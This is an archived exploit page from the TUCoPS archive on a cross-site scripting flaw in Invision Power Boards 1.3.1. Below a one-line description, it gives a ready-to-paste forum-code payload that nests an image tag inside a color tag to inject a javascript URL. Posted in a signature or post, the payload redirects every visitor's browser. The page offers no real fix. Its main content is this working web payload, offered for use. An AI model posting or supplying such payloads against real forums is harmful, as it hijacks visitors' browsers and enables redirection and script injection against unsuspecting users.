Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: hack7771.htm

Invision Power Boards 1.3.1 FINAL XSS Exploit



Invision Power Boards 1.3.1 FINAL XSS Exploit



Description:
Lack of checking in the SML codes.
Exploit:
Put this into any signature or post on an invision forum:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("ja vascript:document.location.replace('http://www.hackthissite.org');") [/color]
Fix:
I'm not good at regexes :)


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH